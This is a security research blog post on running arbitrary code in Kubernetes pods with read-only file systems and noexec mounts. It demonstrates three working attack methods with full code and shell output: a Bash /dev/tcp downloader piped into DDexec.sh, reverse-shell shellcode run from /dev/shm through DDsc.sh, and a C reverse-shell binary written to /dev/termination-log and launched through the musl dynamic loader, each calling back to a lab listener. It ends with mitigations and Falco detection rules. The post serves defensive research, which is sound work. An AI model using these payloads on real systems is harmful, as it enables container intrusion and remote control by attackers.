Executing Arbitrary Code & Executables in Read-Only FileSystems
By Golan Myers on 12 June 2023
The following research examines different methods of executing arbitrary code and executables in read-only file systems where writable folders are marked as noexec, focusing on pods within the Kubernetes context.
What Is A Read-Only File System and Why Should We Use It?
File system permissions typically make use of three main “actions” - read, write and execute. In a read-only file system, files can be read or executed (this varies based on multiple levels of permissions). However, writing to them or creating new files is not permitted even if a process has the correct permissions. This can prevent modification of existing data and attempts to write new data (such as malware) to the system.
Correctly configuring file systems as read-only could act as a security measure. This approach has been widely adopted in the world of containerisation, as it allows for better control and management of containerised applications. Immutable filesystems are consistent and predictable. This makes compliance and auditing simpler, and allows for more accurate threat detection.
Using Kubernetes, this can be set as part of a pod’s configuration file under the securityContext field by setting the readOnlyRootFilesystem value to true:
apiVersion: v1
kind: Pod
metadata:
  name: alpine
spec:
  containers:
  - args:
    - alpine
    image: alpine
    name: pod
    command:
    - "sleep"
    - "60"
    securityContext:
      readOnlyRootFilesystem: true
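Whether the setting took effect can be checked from inside a container by looking at the options of the root mount. The following is a minimal sketch, not part of the original research: the helper name root_fs_mode is hypothetical, and it assumes a Linux /proc/mounts layout (device, mount point, type, options).

```bash
# Hypothetical helper: report whether "/" is mounted ro or rw.
# Reads /proc/mounts-style lines on stdin.
root_fs_mode() {
    local mode=unknown _dev mnt _type opts _rest
    while read -r _dev mnt _type opts _rest; do
        [ "$mnt" = "/" ] || continue
        # Wrap the option list in commas so "ro" cannot match inside another option
        case ",$opts," in
            *,ro,*) mode=ro ;;
            *,rw,*) mode=rw ;;
        esac
    done
    echo "$mode"
}

# Example invocation against the live mount table, if one is available
if [ -r /proc/mounts ]; then
    root_fs_mode < /proc/mounts
fi
```

If several entries exist for "/", the last one listed wins, which matches the mount that is currently visible.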
What Approaches Can Be Taken by A Threat Actor with Access to A Read-Only Pod?
While a read-only file system presents an additional layer of complexity for an attacker, it could still prove useful in the construction of a successful attack chain. The pod acts as a foothold in the environment. Furthermore, it can be used to enumerate the environment from an internal perspective, and potentially as an intermediary used to communicate with additional resources.
The Attack
In our scenario, we are an attacker who has managed to gain a foothold on an application pod. However, the pod’s filesystem is read-only. To further this attack, we must be able to execute arbitrary code and executables on the pod. As such, all methods presume initial access to the target pod with a low privileged user. As our focus is the ability to execute arbitrary code and not the code itself, all the methods will be demonstrated using a simple reverse shell as a Proof of Concept (PoC).
Method #1
In our first scenario, we will be attempting to execute arbitrary code in a read-only pod, configured with the latest version of the standard Nginx image. This method requires /bin/bash being present on the pod.
The configuration for the pod is as follows:
apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - image: nginx:latest
    name: nginx
    securityContext:
      readOnlyRootFilesystem: true
      runAsUser: 101
    ports:
    - containerPort: 80
    volumeMounts:
    - mountPath: /var/run
      name: run
    - mountPath: /var/cache/nginx
      name: nginx-cache
  volumes:
  - name: run
    emptyDir: {}
  - name: nginx-cache
    emptyDir: {}
In the configuration file, we set the readOnlyRootFilesystem attribute in the securityContext field in order to create a pod with a read-only file system. However, Nginx requires the ability to write to specific locations. Therefore, we specified dedicated volumes and volume mounts to account for this. Additionally, the runAsUser attribute has been used to ensure the pod runs as the low-privileged nginx user.
To make sure our configuration was successful, with the pod deployed, we can attempt to create a file:
nginx@nginx-8f44699b7-wbwx6:/$ touch test
touch: cannot touch 'test': Read-only file system
As an attacker with initial access to this pod, we now need to find a way to get our arbitrary code onto the pod. This can sometimes be done using tools such as curl or wget; however, our working assumption is that these are not available to us. Nonetheless, we can use Bash’s built-in /dev/tcp redirection feature. This is typically used to establish a TCP connection to a remote host, but it can also be used to send an HTTP request over that connection and retrieve a file. As Bash functions are stored in memory and not on the file system, the function can be defined and invoked directly in the terminal using the following code:
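function __bindownload() {
    # Split a URL such as http://host:port/path into protocol, server and path
    read proto server path <<<$(echo ${1//// })
    FILE=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    # No explicit port in the URL: fall back to 8080
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=8080
    # Open a bidirectional TCP connection on file descriptor 3
    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${FILE} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
    # Skip the response headers, then stream the body to stdout
    (while read line; do
        [[ "$line" == $'\r' ]] && break
    done && cat) <&3
    exec 3>&-
}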
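The URL handling at the top of the function relies entirely on Bash parameter expansion, which can be hard to read at a glance. The sketch below isolates just that parsing step so it can be tried without opening any network connection. The name split_url and the output format are illustrative only; the 8080 default mirrors the function above.

```bash
# Illustrative only: the same parsing steps as __bindownload, with no networking.
split_url() {
    local proto server path host port file
    # Replace every "/" with a space, then let read split the pieces
    read -r proto server path <<<"${1//// }"
    # Re-join the remaining path components with "/"
    file=/${path// //}
    # Strip ":port" to get the host, and "host:" to get the port
    host=${server//:*}
    port=${server//*:}
    # With no ":port" present both expansions are identical, so use the default
    [[ "$host" == "$port" ]] && port=8080
    printf 'host=%s port=%s file=%s\n' "$host" "$port" "$file"
}

split_url http://192.168.255.137:8080/shell.b64
split_url http://example.com/a/b.txt
```

The second call has no explicit port, so the default is applied and the multi-component path is reassembled as /a/b.txt.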
Now we can download files from our host to the pod. However, the file system will not allow these files to be saved, as it is not possible to write to the read-only file system. In order to bypass this restriction, we will use the DDexec.sh script developed by Yago Gutierrez. This script allows for the hijacking of an existing process in order to replace it with our own code. However, for the attack to work, the download and the execution must happen together in a single command, as nothing can be stored in between.
To achieve this, the __bindownload function can be used to retrieve both DDexec.sh and our desired binary. Rather than downloading to disk, the output of one __bindownload call (the binary, here served as shell.b64) is piped to the standard input of a Bash process that runs DDexec.sh, which is itself fetched by a second __bindownload call through process substitution. This process avoids ever needing to write any files to the file system.
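The shape of that command, data arriving on standard input while the script arrives through process substitution, can be tried with harmless stand-ins. In this sketch emit_script and emit_data are hypothetical placeholders for the two downloads; nothing is fetched and nothing is written to disk.

```bash
# Stand-in for the downloaded script: a one-line program that upper-cases stdin
emit_script() { printf 'tr a-z A-Z\n'; }

# Stand-in for the downloaded payload: plain text instead of a binary
emit_data() { printf 'hello from stdin\n'; }

# The inner bash reads its script from a /dev/fd path created by <( ... ),
# while the script's own stdin is the pipe fed by emit_data.
emit_data | bash <(emit_script)
```

Process substitution is a Bash feature, which is one reason this approach depends on /bin/bash being present.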
Victim
nginx@nginx-8f44699b7-wbwx6:/$ __bindownload http://192.168.255.137:8080/shell.b64 | bash <(__bindownload http://192.168.255.137:8080/ddexec.sh)
If we look at our server’s HTTP traffic we can see the pod’s requests for DDexec.sh and our desired binary:
┌──(newkalier㉿Newkalier)-[~/DDexec]
└─$ python3 -m http.server 8080 [Mar 02 2023 12:11:26]
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
192.168.255.1 - - [02/Mar/2023 12:14:09] "GET /ddexec.sh HTTP/1.0" 200 -
192.168.255.1 - - [02/Mar/2023 12:14:09] "GET /shell.b64 HTTP/1.0" 200 -
With the files downloaded and executed, looking at our listener we can see a shell:
┌──(newkalier㉿Newkalier)-[~]
└─$ nc -lvnp 9898 [Mar 02 2023 12:11:36]
listening on [any] 9898 ...
connect to [192.168.255.137] from (UNKNOWN) [192.168.255.1] 61782
hostname
nginx-8f44699b7-wbwx6
Method #2
OK, but what if we don’t even have Bash in our container? In our second scenario, we will be adding a layer of complexity. Certain images commonly used in containerisation, such as Alpine, do not include Bash by default, but rather ship a more minimal shell as sh (BusyBox ash in Alpine's case). In these scenarios, we will not be able to use /dev/tcp as it is a Bash feature. Additionally, redirection involving multiple commands is more limited.
For this scenario, we will be using a pod with the latest Alpine image using the following configuration:
apiVersion: v1
kind: Pod
metadata:
  name: alpine
spec:
  containers:
  - args:
    - alpine
    image: alpine
    name: pod
    command:
    - "sleep"
    - "60"
    securityContext:
      runAsUser: 65534
      readOnlyRootFilesystem: true
Once again, in the configuration file, we set the readOnlyRootFilesystem attribute in the securityContext field in order to create a pod with a read-only file system. Additionally, we have instructed the pod to run as the low-privileged nobody user (UID 65534) with the runAsUser attribute.
As in the previous method, we require a way to get our arbitrary code onto the pod. While exploring the /bin folder in the pod, we find the busybox binary. This is a lightweight software suite which is often used in container images due to its size and efficiency. It is found by default in images such as Alpine and OpenWrt. One of the tools it offers is busybox wget, essentially a compact version of wget. In our case, it can be used to transfer a file from our host to the pod. However, as previously mentioned, redirection with multiple commands is trickier with sh, so we need to explore alternative avenues.
Using the mount command, we find there is an interesting file system that is writable: /dev/shm.
~ $ mount | grep shm
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/shm is a temporary file system (tmpfs) in Unix-like environments. It is used to implement the shared memory concept, allowing for an efficient means of passing data between programs. It is mounted as a virtual file system in memory. Due to its nature, any data stored in it will be lost upon system shutdown. It is uncommon for /dev/shm to be mounted without write permissions (even in read-only systems) as this would impact the performance of inter-process communication.
Although it is writable, /dev/shm is marked as noexec, meaning anything we write to it cannot be executed directly.
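The same two properties, writable and noexec, can be read off for every mount at once rather than one grep at a time. The following is a rough sketch under the assumption of a Linux /proc/mounts layout; the helper name list_writable_mounts is hypothetical.

```bash
# Hypothetical helper: for every mount with the rw option, print the mount
# point and whether direct execution is allowed. Reads /proc/mounts on stdin.
list_writable_mounts() {
    local _dev mnt _type opts _rest exec_state
    while read -r _dev mnt _type opts _rest; do
        # Skip anything not mounted read-write
        case ",$opts," in *,rw,*) ;; *) continue ;; esac
        # Flag mounts that forbid direct execution
        case ",$opts," in
            *,noexec,*) exec_state=noexec ;;
            *)          exec_state=exec ;;
        esac
        printf '%s %s\n' "$mnt" "$exec_state"
    done
}

# Example invocation against the live mount table, if one is available
if [ -r /proc/mounts ]; then
    list_writable_mounts < /proc/mounts
fi
```

Note that a mount being rw does not mean the current user can write to it; file ownership and mode still apply.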
In order to bypass this restriction, we will execute sh, which resides on a mount that permits execution. The noexec option only prevents files on that mount from being executed directly; sh can still read a script stored in /dev/shm and interpret it, and the script can read and write further files there. For this attack, we will use the DDsc.sh script (also developed by Yago Gutierrez), which is similar to DDexec.sh but allows us to run shellcode directly.
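The difference between executing a file and having an interpreter read it can be seen with a harmless script. This sketch uses a missing execute bit as a stand-in for the noexec mount option, which is only a loose analogy; the function name run_without_exec_bit is hypothetical.

```bash
# Loose analogy: a script with no execute permission cannot be launched
# directly, yet sh runs it because sh only needs to read the file.
run_without_exec_bit() {
    local script status
    script=$(mktemp) || return 1
    printf 'echo "ran via interpreter"\n' > "$script"
    chmod 0644 "$script"          # readable and writable, not executable
    sh "$script"                  # the interpreter is what gets executed
    status=$?
    rm -f "$script"
    return "$status"
}

run_without_exec_bit
```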
First, we will use busybox wget to write DDsc.sh and our shellcode to temporary files in /dev/shm:
dde=$(mktemp -p /dev/shm)
busybox wget -O - https://raw.githubusercontent.com/arget13/DDexec/main/ddsc.sh > $dde
code=$(mktemp -p /dev/shm)
echo "6a2958996a025f6a015e0f05489748b90200270fc0a8ff89514889e66a105a6a2a580f056a035e48ffce6a21580f0575f66a3b589948bb2f62696e2f736800534889e752574889e60f05" > $code
Next, we will use sh to read and execute DDsc.sh from /dev/shm, which will run our shellcode. This will result in a reverse shell from the pod to our host:
sh $dde -x < $code
┌──(newkalier㉿Newkalier)-[~]
└─$ nc -lvnp 9999 [Mar 02 2023 14:09:28]
listening on [any] 9999 ...
connect to [192.168.255.137] from (UNKNOWN) [192.168.255.1] 64653
hostname
alpine
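For anyone analysing a sample like the hex string written to $code above, the listener address can be recovered without running anything. The sketch below assumes the sockaddr_in structure is loaded as an immediate right after the bytes 48 b9 (a 64-bit move into rcx) and begins with 02 00 for AF_INET, which holds for this particular string but not for shellcode in general. The helper name decode_sockaddr is hypothetical.

```bash
# Hypothetical analysis helper: print ip:port embedded in a hex shellcode
# string, assuming the layout 48b9 | 0200 | port (2 bytes) | IPv4 (4 bytes).
decode_sockaddr() {
    local hex=$1 rest port a b c d
    # Drop everything up to and including the opcode and the AF_INET marker
    rest=${hex#*48b90200}
    # If nothing was stripped, the expected byte sequence is not present
    [ "$rest" != "$hex" ] || return 1
    # Port and address are stored in network byte order
    port=$((16#${rest:0:4}))
    a=$((16#${rest:4:2})); b=$((16#${rest:6:2}))
    c=$((16#${rest:8:2})); d=$((16#${rest:10:2}))
    printf '%d.%d.%d.%d:%d\n' "$a" "$b" "$c" "$d" "$port"
}

decode_sockaddr "6a2958996a025f6a015e0f05489748b90200270fc0a8ff89514889e66a105a6a2a580f056a035e48ffce6a21580f0575f66a3b589948bb2f62696e2f736800534889e752574889e60f05"
```

For the string used in this method, the bytes 270f and c0a8ff89 decode to port 9999 and 192.168.255.137, matching the listener shown above.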
Method #3
Our first two methods can be tricky to mitigate or detect, although doing so is still possible. In our third scenario, we will be pursuing a separate path from the previous two. As in the previous method, we will be using a pod with the latest Alpine image configured as follows:
apiVersion: v1
kind: Pod
metadata:
  name: alpine
spec:
  containers:
  - args:
    - alpine
    image: alpine
    name: pod
    command:
    - "sleep"
    - "60"
    securityContext:
      runAsUser: 65534
      readOnlyRootFilesystem: true
In our final method, we will examine the ability to run executable files through dynamic linker/loader libraries without execute permissions. When an executable is launched or a shared library is loaded, the dynamic linker is responsible for linking the dynamic libraries at runtime as well as resolving symbols. We can find the dynamic linker under “Dynamic Program Loader” within the output of ldd for our pod:
~ $ ldd
musl libc (x86_64)
Version 1.2.3
Dynamic Program Loader
Usage: /lib/ld-musl-x86_64.so.1 [options] [--] pathname
Once we know what linker the system uses, in this case ld-musl-x86_64.so.1, we can create an executable to suit our needs. First, we will take a simple reverse shell written in C:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 9999;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.255.137");

    connect(sockt, (struct sockaddr *) &revsockaddr,
            sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);

    return 0;
}
Next, we will compile it using musl-gcc to suit our Dynamic Program Loader:
musl-gcc -pie ~/shell.c -o ~/shell
Before we can use our Dynamic Program Loader, we need a way to get our file onto the pod. When examining the file system using the mount command, you’ll notice that multiple files are individually mounted as writable as part of standard functionality. For example, /etc/hosts:
~ $ mount | grep etc/hosts
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,discard,errors=remount-ro)
In addition to the /etc/hosts file, the /etc/resolv.conf and /etc/hostname are also commonly mounted with write permissions. However, all these files require elevated privileges (root) in order to write to them.
~ $ ls -l /etc/hosts
-rw-r--r-- 1 root root 203 Mar 2 14:00 /etc/hosts
One file which is commonly mounted with write permissions and does not require elevated privileges to write to is /dev/termination-log. In Kubernetes, a terminationMessagePath field can be specified in the container configuration. This specifies the path of the file to which the container writes its termination message, and from which Kubernetes retrieves it. When the field is not explicitly configured, the default value of /dev/termination-log is used.
~ $ mount | grep rw | grep sda
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,discard,errors=remount-ro)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,discard,errors=remount-ro)
~ $ ls -l /dev/termination-log
-rw-rw-rw- 1 root root 0 Mar 2 14:45 /dev/termination-log
We can again use busybox wget in order to get our file onto the pod by writing to the /dev/termination-log file:
~ $ busybox wget -O - http://192.168.255.137:8080/shell > /dev/termination-log
Connecting to 192.168.255.137:8080 (192.168.255.137:8080)
writing to stdout
- 100% |*********************************************************| 18152 0:00:00 ETA
written to stdout
Lastly, we will run the file using the Dynamic Program Loader, bypassing the typical requirement for executable file permissions:
Victim
~ $ ls -l /dev/termination-log
-rw-rw-rw- 1 root root 18152 Mar 2 15:02 /dev/termination-log
~ $ /lib/ld-musl-x86_64.so.1 /dev/termination-log
Kali
┌──(newkalier㉿Newkalier)-[~]
└─$ nc -lvnp 9999 [Mar 02 2023 15:03:45]
listening on [any] 9999 ...
connect to [192.168.255.137] from (UNKNOWN) [192.168.255.1] 64835
hostname
alpine
How Do We Prevent These Attacks?
Now that we’ve discussed some possible attack vectors, let’s talk about some mitigation options.
The first two methods use in-memory execution, and can be quite tricky to prevent. It is possible to use SELinux in enforcing mode to prevent access to /proc/[pid]/mem or to deny execmem. Unfortunately, using SELinux can be quite complex, and requires in-depth knowledge of the system and its configuration. As a result, many users and administrators choose not to use it, opting for simpler security mechanisms that may be less effective but easier to manage.
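Before relying on SELinux for this, it is worth confirming which mode a node is actually running in. The sketch below reads the kernel's enforce flag, assuming selinuxfs is mounted at its usual location of /sys/fs/selinux; the helper name selinux_mode is hypothetical, and "unavailable" simply means the flag could not be read.

```bash
# Hypothetical helper: report the SELinux mode from the kernel's enforce flag.
# An alternative file path can be passed for testing.
selinux_mode() {
    local enforce_file=${1:-/sys/fs/selinux/enforce}
    if [ ! -r "$enforce_file" ]; then
        # SELinux disabled, selinuxfs not mounted, or the flag is not readable
        echo unavailable
        return 0
    fi
    case "$(cat "$enforce_file")" in
        1) echo enforcing ;;
        0) echo permissive ;;
        *) echo unknown ;;
    esac
}

selinux_mode
```

Only the enforcing result means policy denials are actually applied; in permissive mode they are logged but not enforced.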
Our second option is detection. We can use tools such as Falco in pods to detect execution of files from /dev/shm and trigger alerts. Additionally, we can use it to detect unexpected network connections. In the following examples, the first rule will trigger an alert with the warning priority (meaning it is potentially suspicious but not necessarily malicious) for most scenarios which result in the execution of a file which resides in /dev/shm. This rule was taken from Falco's library. However, we have added a condition: proc.args contains "/dev/shm" or proc.cwd startswith "/dev/shm". Adversaries attempting to avoid detection may try to eliminate the need for file execution directly from the directory by using tools such as cat, echo or base64. This condition was added to detect such processes, by searching for processes with /dev/shm as an argument. It should be noted that this rule may generate some false positive alerts.
The second rule will trigger an alert with the warning priority whenever a process establishes an outgoing network connection to an IP which doesn’t match the IP ranges specified in the rule.
Detecting File Execution From /dev/shm
- rule: Execution from /dev/shm
  desc: This rule detects file execution from the /dev/shm directory, a common tactic for threat actors to stash their readable+writable+(sometimes)executable files.
  condition: >
    spawned_process and
    (proc.exe startswith "/dev/shm/" or
    (proc.cwd startswith "/dev/shm/" and proc.exe startswith "./" ) or
    (shell_procs and proc.args startswith "-c /dev/shm") or
    (shell_procs and proc.args startswith "-i /dev/shm") or
    (shell_procs and proc.args startswith "/dev/shm") or
    (proc.args contains "/dev/shm" or proc.cwd startswith "/dev/shm") or
    (proc.cwd startswith "/dev/shm/" and proc.args startswith "./" )) and
    not container.image.repository in (falco_privileged_images, trusted_images)
  output: "File execution detected from /dev/shm (proc.cmdline=%proc.cmdline connection=%fd.name user.name=%user.name user.loginuid=%user.loginuid container.id=%container.id evt.type=%evt.type evt.res=%evt.res proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath user.uid=%user.uid user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name container.name=%container.name image=%container.image.repository)"
  priority: WARNING
Detecting Unexpected Network Connections
- rule: Unexpected Outgoing Connection
  desc: Detects unexpected outgoing connections
  condition: >
    (evt.type = connect and evt.dir=< and
    fd.typechar='4' and
    fd.sock_family != 'unix' and
    (not fd.ip in (127.0.0.1, 192.168.0.0/16, 10.0.0.0/8, 172.16.0.0/12))
    )
  output: >
    Unexpected outgoing connection from process %proc.name to %fd.ip
  priority: WARNING
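The allowlist in the second rule is easier to reason about when it can be tested against concrete addresses. The following sketch reimplements only the range check in shell, as an illustration of which destinations the rule would ignore; it is not how Falco evaluates the condition, and the helper name is_allowed_ip is hypothetical.

```bash
# Illustration only: return 0 if an IPv4 address falls inside the ranges
# listed in the rule (127.0.0.1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16).
is_allowed_ip() {
    local second
    case "$1" in
        127.0.0.1|10.*|192.168.*)
            return 0
            ;;
        172.*)
            # 172.16.0.0/12 covers second octets 16 through 31
            second=${1#172.}
            second=${second%%.*}
            [ "$second" -ge 16 ] 2>/dev/null && [ "$second" -le 31 ]
            ;;
        *)
            return 1
            ;;
    esac
}

for ip in 192.168.255.137 172.20.1.1 172.32.0.1 8.8.8.8; do
    if is_allowed_ip "$ip"; then
        echo "$ip allowed (no alert)"
    else
        echo "$ip outside ranges (alert)"
    fi
done
```

The listener address used in the demonstrations above, 192.168.255.137, falls inside 192.168.0.0/16, so in a lab laid out like this one the ranges would need narrowing for the rule to fire.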
We can use the second Falco rule above to detect anomalous network connections being established when an attacker attempts to get DDexec.sh, DDsc.sh or the compiled code onto the pod. Additionally, for the final method, the termination log’s location should be mounted with the noexec option, which also stops the dynamic loader from mapping a file on that mount as executable.
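Direct invocation of the dynamic loader, as in the final method, can also be looked for on a running system, since a process started this way has the loader itself as its executable. The sketch below is a rough heuristic rather than a complete detection: the helper names and the list of loader file name patterns are assumptions, and the match disappears once the process replaces itself with another program.

```bash
# Hypothetical heuristic: does this path look like a dynamic loader?
is_loader_path() {
    case "${1##*/}" in
        ld-musl-*.so.*|ld-linux*.so.*|ld.so|ld-*.so) return 0 ;;
    esac
    return 1
}

# List PIDs whose executable is a loader, i.e. programs started as
# "/lib/ld-... <file>" rather than executed directly.
scan_loader_procs() {
    local exe target pid
    for exe in /proc/[0-9]*/exe; do
        # Unreadable or vanished entries are skipped
        target=$(readlink "$exe" 2>/dev/null) || continue
        if is_loader_path "$target"; then
            pid=${exe#/proc/}
            printf '%s %s\n' "${pid%/exe}" "$target"
        fi
    done
}

scan_loader_procs
```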
Conclusion
Creating containers with read-only file systems is recommended and can be useful as an additional layer of security. However, this solution does not make containers magically secure. Container security is complex and requires multiple layers of defence comprising active restrictions, monitoring, and alerting. There is no “one-size-fits-all” solution, as different environments will require different capabilities. Therefore, each environment must be viewed individually, and only once its requirements are fully understood should a security solution be tailored for it.
References
[1] DDexec/DDsc:
https://github.com/arget13/DDexec
[2] SELinux Project:
https://selinuxproject.org/page/ObjectClassesPerms#memprotect
[3] Kubernetes Docs:
https://kubernetes.io/docs/home/
[4] The Falco Project:
https://falco.org/